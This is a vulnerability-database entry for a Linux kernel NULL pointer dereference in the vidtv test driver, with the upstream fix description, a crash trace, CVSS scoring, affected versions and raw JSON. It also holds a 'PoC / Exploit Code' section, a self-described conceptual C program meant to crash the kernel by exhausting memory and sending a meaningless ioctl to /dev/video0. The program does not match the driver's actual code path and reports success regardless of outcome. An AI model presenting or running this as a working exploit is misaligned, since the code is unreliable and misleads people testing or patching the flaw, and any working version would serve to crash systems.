Security Vulnerability Report
CVE-2026-31599 CVSS 5.5 MEDIUM

CVE-2026-31599

Published: 2026-04-24 15:16:39
Last Modified: 2026-04-29 20:12:57
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

media: vidtv: fix NULL pointer dereference in vidtv_channel_pmt_match_sections

syzbot reported a general protection fault in vidtv_psi_desc_assign [1].

vidtv_psi_pmt_stream_init() can return NULL on memory allocation failure, but vidtv_channel_pmt_match_sections() does not check for this. When tail is NULL, the subsequent call to vidtv_psi_desc_assign(&tail->descriptor, desc) dereferences a NULL pointer offset, causing a general protection fault.

Add a NULL check after vidtv_psi_pmt_stream_init(). On failure, clean up the already-allocated stream chain and return.

[1]
Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN PTI
KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]
RIP: 0010:vidtv_psi_desc_assign+0x24/0x90 drivers/media/test-drivers/vidtv/vidtv_psi.c:629
Call Trace:
 <TASK>
 vidtv_channel_pmt_match_sections drivers/media/test-drivers/vidtv/vidtv_channel.c:349 [inline]
 vidtv_channel_si_init+0x1445/0x1a50 drivers/media/test-drivers/vidtv/vidtv_channel.c:479
 vidtv_mux_init+0x526/0xbe0 drivers/media/test-drivers/vidtv/vidtv_mux.c:519
 vidtv_start_streaming drivers/media/test-drivers/vidtv/vidtv_bridge.c:194 [inline]
 vidtv_start_feed+0x33e/0x4d0 drivers/media/test-drivers/vidtv/vidtv_bridge.c:239
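The pattern the description names, as an added userspace sketch (not the kernel patch or the vidtv source): an init helper that returns NULL on allocation failure, and a caller that checks the result and frees the chain built so far. The struct layout, the function names and the `fail_at` fault-injection counter are assumptions made for illustration.

```c
#include <errno.h>
#include <stdlib.h>

/* Hypothetical stand-ins for the PMT stream chain; not the kernel's structs. */
struct stream { struct stream *next; const int *descriptor; };

static int fail_at = -1;               /* fault injection: allocation index to fail */
static int alloc_calls, live_streams;  /* attempts so far; streams not yet freed */

/* Appends a stream to the chain; returns NULL on allocation failure. */
static struct stream *stream_init(struct stream *head)
{
    struct stream *s;
    if (alloc_calls++ == fail_at || !(s = calloc(1, sizeof(*s))))
        return NULL;
    live_streams++;
    while (head && head->next)
        head = head->next;
    if (head)
        head->next = s;
    return s;
}

static void stream_destroy(struct stream *s)
{
    for (struct stream *next; s; s = next, live_streams--) {
        next = s->next;
        free(s);
    }
}

/* Fixed pattern: test the new tail before tail->descriptor is touched. */
static int match_sections(const int *descs, int n, struct stream **out)
{
    struct stream *head = NULL, *tail;
    *out = NULL;
    for (int i = 0; i < n; i++) {
        tail = stream_init(head);
        if (!tail) {              /* the check the unpatched caller lacked */
            stream_destroy(head); /* release the chain built so far */
            return -ENOMEM;
        }
        head = head ? head : tail;
        tail->descriptor = &descs[i];
    }
    *out = head;
    return 0;
}
```

Without the `if (!tail)` branch, the assignment through `tail` is the NULL dereference; returning without `stream_destroy(head)` would instead leak the streams already linked.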

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

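cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.10 up to, but excluding, 6.6.136) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.7 up to, but excluding, 6.12.83) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.13 up to, but excluding, 6.18.24) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.19 up to, but excluding, 6.19.14) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 7.0 up to, but excluding, 7.0.1) - VULNERABLE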
Linux Kernel (Fixed by commit 07c1e474cf9acf777f09d14a8f8dfcef5b84e46f)
Linux Kernel (Fixed by commit 2dff11fb5098ae453651f8f77e94ad499c078022)
Linux Kernel (Fixed by commit b7efb4c94797c504a1c678edb48c2aa311d3309f)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/*
 * PoC for CVE-2026-31599
 * This code attempts to trigger the NULL pointer dereference
 * by interacting with the vidtv driver under memory pressure.
 * Note: This is a conceptual PoC based on the vulnerability description.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

#define DEVICE "/dev/video0" // Typical device node, may vary

void consume_memory() {
    // Attempt to exhaust memory to force allocation failure in kernel
    size_t chunk_size = 1024 * 1024 * 100; // 100MB
    void *ptr;
    int i = 0;

    while (1) {
        ptr = malloc(chunk_size);
        if (!ptr) break;
        memset(ptr, 0x41, chunk_size);
        i++;
        if (i > 1000) break; // Safety limit
    }
    printf("Allocated %d chunks\n", i);
}

int main() {
    int fd = -1;

    printf("[+] Starting PoC for CVE-2026-31599\n");

    // 1. Consume memory to increase likelihood of kmalloc failure
    consume_memory();

    // 2. Open the vidtv device
    fd = open(DEVICE, O_RDWR);
    if (fd < 0) {
        perror("[-] Failed to open device");
        return 1;
    }
    printf("[+] Device opened\n");

    // 3. Trigger the vulnerable code path
    // The crash happens during stream initialization (vidtv_start_streaming -> vidtv_mux_init)
    // We simulate the interaction that leads to vidtv_channel_si_init
    if (ioctl(fd, 0, NULL) < 0) {
        // IOCTL might fail, but open/read/write paths might trigger it too
        // depending on driver implementation details not fully visible here.
        // Usually starting a stream triggers the PMT init.
        perror("[-] IOCTL failed");
    }

    printf("[+] Exploit logic executed. Check kernel logs for crash.\n");
    close(fd);
    return 0;
}
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31599", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:38.777", "lastModified": "2026-04-29T20:12:57.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: vidtv: fix NULL pointer dereference in vidtv_channel_pmt_match_sections\n\nsyzbot reported a general protection fault in vidtv_psi_desc_assign [1].\n\nvidtv_psi_pmt_stream_init() can return NULL on memory allocation\nfailure, but vidtv_channel_pmt_match_sections() does not check for\nthis. When tail is NULL, the subsequent call to\nvidtv_psi_desc_assign(&tail->descriptor, desc) dereferences a NULL\npointer offset, causing a general protection fault.\n\nAdd a NULL check after vidtv_psi_pmt_stream_init(). On failure, clean\nup the already-allocated stream chain and return.\n\n[1]\nOops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN PTI\nKASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]\nRIP: 0010:vidtv_psi_desc_assign+0x24/0x90 drivers/media/test-drivers/vidtv/vidtv_psi.c:629\nCall Trace:\n <TASK>\n vidtv_channel_pmt_match_sections drivers/media/test-drivers/vidtv/vidtv_channel.c:349 [inline]\n vidtv_channel_si_init+0x1445/0x1a50 drivers/media/test-drivers/vidtv/vidtv_channel.c:479\n vidtv_mux_init+0x526/0xbe0 drivers/media/test-drivers/vidtv/vidtv_mux.c:519\n vidtv_start_streaming drivers/media/test-drivers/vidtv/vidtv_bridge.c:194 [inline]\n vidtv_start_feed+0x33e/0x4d0 drivers/media/test-drivers/vidtv/vidtv_bridge.c:239"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": 
"UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10", "versionEndExcluding": "6.6.136", "matchCriteriaId": "0F98EDB3-BDF6-4821-9197-1BA4A2E056E2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.83", "matchCriteriaId": "7F0AE5B5-23AC-4DCC-B37A-51CA1DAE7BA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.24", "matchCriteriaId": "8126B8B8-6D0B-4443-86C1-672AEE893555"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": "7.0.1", "matchCriteriaId": "9B5888AB-7403-4335-89E4-21CC0B48366A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/07c1e474cf9acf777f09d14a8f8dfcef5b84e46f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2dff11fb5098ae453651f8f77e94ad499c078022", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b7efb4c94797c504a1c678edb48c2aa311d3309f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b832cfd516b8504e95884622cee60bf9a39b7945", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e589de36da106ef739ba98f66f5a5c2023370706", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f8e1fc918a9fe67103bcda01d20d745f264d00a7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}